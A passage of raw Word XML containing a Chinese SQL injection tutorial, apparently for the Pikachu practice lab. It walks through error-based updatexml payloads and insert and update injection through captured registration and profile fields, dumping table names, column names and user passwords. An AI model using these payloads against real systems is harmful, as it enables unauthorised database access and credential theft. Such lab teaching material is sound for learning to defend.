          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002445C4">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>6、</w:t>
      </w:r>
      <w:r w:rsidR="004254B6" w:rsidRPr="002445C4">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>爆字段内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A5E4B3" w14:textId="77777777" w:rsidR="004254B6" w:rsidRDefault="002445C4"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C67631">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>获取</w:t>
      </w:r>
      <w:r w:rsidRPr="002C14F3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>字段</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>内容</w:t>
      </w:r>
      <w:r w:rsidRPr="00C67631">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，输入：</w:t>
      </w:r>
      <w:r w:rsidR="001725AE" w:rsidRPr="001725AE">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>k' and  updatexml(1,concat(0x7e,(select password from users limit 0,1)),0)#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5543947F" w14:textId="77777777" w:rsidR="004254B6" w:rsidRDefault="002445C4"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noProof/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45484936" wp14:editId="012D64DA">
            <wp:extent cx="5278120" cy="723981"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="1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278120" cy="723981"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA4B484" w14:textId="77777777" w:rsidR="002445C4" w:rsidRDefault="002445C4"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p>
    <w:p w14:paraId="75ADE066" w14:textId="77777777" w:rsidR="002C14F3" w:rsidRPr="002C14F3" w:rsidRDefault="002C14F3"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2C14F3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>返回结果为连接参数产生的字符串。如有任何一个参数为NULL ，则返回值为 NULL。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A86AEF4" w14:textId="77777777" w:rsidR="002C14F3" w:rsidRPr="002C14F3" w:rsidRDefault="002C14F3" w:rsidP="002C14F3">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C14F3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>通过查询@@version,返回版本。然后CONCAT将其字符串化。因为UPDATEXML第二个参数需要Xpath格式的字符串,所以不符合要求，然后报错。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF290E6" w14:textId="77777777" w:rsidR="00F562B1" w:rsidRPr="009E7F7C" w:rsidRDefault="00F562B1" w:rsidP="00F562B1">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4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>insert注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AD7B41" w14:textId="77777777" w:rsidR="00F562B1" w:rsidRDefault="00F562B1" w:rsidP="00F562B1">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insert注入，就是前端注册的信息最终会被后台通过insert这个操作插入数据库，后台在接受前端的注册数据时没有做防SQL注入的处理，导致前端的输入可以直接拼接SQL到后端的insert相关内容中，导致了insert注入。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615E5330" w14:textId="77777777" w:rsidR="00F562B1" w:rsidRDefault="00F562B1" w:rsidP="00F562B1">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到数据库中输入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML0"/>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono" w:cs="DejaVu Sans Mono"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>insert into member (username,pw,sex,phonenum,email,address)</w:t>
      </w:r>
      <w:r w:rsidR="00415E78">
        <w:rPr>
          <w:rStyle w:val="HTML0"/>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono" w:cs="DejaVu Sans Mono" w:hint="eastAsia"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML0"/>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono" w:cs="DejaVu Sans Mono"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>values('</w:t>
      </w:r>
      <w:r w:rsidR="00415E78">
        <w:rPr>
          <w:rStyle w:val="HTML0"/>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono" w:cs="DejaVu Sans Mono" w:hint="eastAsia"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>oldboy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML0"/>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono" w:cs="DejaVu Sans Mono"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
      <w:r w:rsidR="00415E78">
        <w:rPr>
          <w:rStyle w:val="HTML0"/>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono" w:cs="DejaVu Sans Mono" w:hint="eastAsia"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>123456</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML0"/>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono" w:cs="DejaVu Sans Mono"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>,1,2,3,4);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>来插入一个用户，在输入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML0"/>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono" w:cs="DejaVu Sans Mono"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>select * from member;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>查看所有用户</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAA4BE6" w14:textId="77777777" w:rsidR="00F562B1" w:rsidRDefault="00415E78" w:rsidP="00F562B1">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noProof/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4582B691" wp14:editId="42A2BB6F">
            <wp:extent cx="5278120" cy="469148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8120" cy="4691489"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="722EB33C" w14:textId="77777777" w:rsidR="00C20796" w:rsidRPr="00C20796" w:rsidRDefault="00C20796" w:rsidP="00C20796">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进入网站注册</w:t>
      </w:r>
      <w:r w:rsidR="00BC22FD">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>页面，填写网站注册相关信息，通过Burp抓包</w:t>
      </w:r>
      <w:r w:rsidRPr="00C20796">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>在用户名输入</w:t>
      </w:r>
      <w:r w:rsidR="00BC22FD">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>相关payload，格式如下</w:t>
      </w:r>
      <w:r w:rsidRPr="00C20796">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049EE83B" w14:textId="77777777" w:rsidR="00C20796" w:rsidRDefault="00BC22FD" w:rsidP="00C20796">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Pr>
          <w:rStyle w:val="HTML0"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
          <w:color w:val="ABB2BF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>oldboy</w:t>
      </w:r>
      <w:r w:rsidR="00C20796">
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="98C379"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>'or updatexml(1,concat(0x7e,(</w:t>
      </w:r>
      <w:r w:rsidR="00C20796">
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="98C379"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>命令</w:t>
      </w:r>
      <w:r w:rsidR="00C20796">
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="98C379"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>)),0) or'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3FD468" w14:textId="77777777" w:rsidR="00C20796" w:rsidRPr="00BC22FD" w:rsidRDefault="00C20796" w:rsidP="00C20796">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sidRPr="00BC22FD">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1. 爆表名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC483BB" w14:textId="77777777" w:rsidR="00F562B1" w:rsidRPr="00E85D57" w:rsidRDefault="00E85D57" w:rsidP="00E85D57">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sidRPr="00E85D57">
        <w:rPr>
          <w:rStyle w:val="HTML0"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="ABB2BF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>oldboy'or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='pikachu' limit 0,1)),0) or'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FE70A1" w14:textId="77777777" w:rsidR="00E85D57" w:rsidRDefault="00E85D57"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77FD5FB2" wp14:editId="4E4D2FB7">
            <wp:extent cx="5278120" cy="2619284"/>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8120" cy="2619284"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1333A636" w14:textId="77777777" w:rsidR="00D667C0" w:rsidRPr="00BC22FD" w:rsidRDefault="00D667C0" w:rsidP="00D667C0">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2</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC22FD">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>. 爆</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>列</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC22FD">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7C114D" w14:textId="77777777" w:rsidR="00E85D57" w:rsidRPr="00D667C0" w:rsidRDefault="00D667C0" w:rsidP="00D667C0">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sidRPr="00D667C0">
        <w:rPr>
          <w:rStyle w:val="HTML0"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="ABB2BF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>' or updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users'limit 2,1)),0) or'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B08CD8" w14:textId="77777777" w:rsidR="00E85D57" w:rsidRDefault="00D667C0"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022C69A8" wp14:editId="7CDE1444">
            <wp:extent cx="5278120" cy="2492353"/>
            <wp:effectExtent l="1905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78120" cy="2492353"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3117F417" w14:textId="77777777" w:rsidR="00D667C0" w:rsidRPr="00BC22FD" w:rsidRDefault="00D667C0" w:rsidP="00D667C0">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3</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC22FD">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>. 爆</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFBE3FA" w14:textId="77777777" w:rsidR="00D667C0" w:rsidRDefault="00D667C0" w:rsidP="00D667C0">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sidRPr="00D667C0">
        <w:rPr>
          <w:rStyle w:val="HTML0"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="ABB2BF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML0"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
          <w:color w:val="ABB2BF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D667C0">
        <w:rPr>
          <w:rStyle w:val="HTML0"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="ABB2BF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>or updatexml(1,concat(0x7e,(select password from users limit 0,1)),0) or'</w:t>
      </w:r>
      <w:r w:rsidR="00F6652B">
        <w:rPr>
          <w:rStyle w:val="HTML0"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
          <w:color w:val="ABB2BF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F6652B">
        <w:rPr>
          <w:rStyle w:val="HTML0"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
          <w:color w:val="ABB2BF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>等同</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2065F4EB" w14:textId="77777777" w:rsidR="00F6652B" w:rsidRPr="00D667C0" w:rsidRDefault="00F6652B" w:rsidP="00F6652B">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sidRPr="00F6652B">
        <w:rPr>
          <w:rStyle w:val="HTML0"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="ABB2BF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>' or updatexml(1,concat(0x7e,(select password from users limit 0,1)),0) or '1'='1''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0271A208" w14:textId="77777777" w:rsidR="00D667C0" w:rsidRPr="00E85D57" w:rsidRDefault="00D667C0"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6EBC646C" wp14:editId="4C656D68">
            <wp:extent cx="5278120" cy="2515994"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>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278120" cy="2515994"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C61CB65" w14:textId="77777777" w:rsidR="001E4AB4" w:rsidRPr="009E7F7C" w:rsidRDefault="001E4AB4" w:rsidP="001E4AB4">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w:t>
      </w:r>
      <w:r w:rsidR="00D9713B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>update注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC4CE44" w14:textId="77777777" w:rsidR="00D4465E" w:rsidRDefault="00691179" w:rsidP="00D4465E">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sidRPr="00691179">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>与insert注入的方法大体相同，区别在于update用于用户登陆端，insert用于用于用户注册端。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F29D8C0" w14:textId="77777777" w:rsidR="001E4AB4" w:rsidRPr="00D4465E" w:rsidRDefault="00D4465E" w:rsidP="001E4AB4">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一般登录网站前台或后台更新用户信息的地方，填写用户需要修改相关信息，通过Burp抓包</w:t>
      </w:r>
      <w:r w:rsidRPr="00C20796">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>在用户名输入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>相关payload，格式如下</w:t>
      </w:r>
      <w:r w:rsidRPr="00C20796">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136D139F" w14:textId="77777777" w:rsidR="00D4465E" w:rsidRPr="00D4465E" w:rsidRDefault="00D4465E" w:rsidP="00D4465E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="0" w:firstLine="420"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4465E">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>update注入：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A967461" w14:textId="77777777" w:rsidR="00F562B1" w:rsidRPr="00377F48" w:rsidRDefault="00377F48" w:rsidP="00377F48">
      <w:pPr>
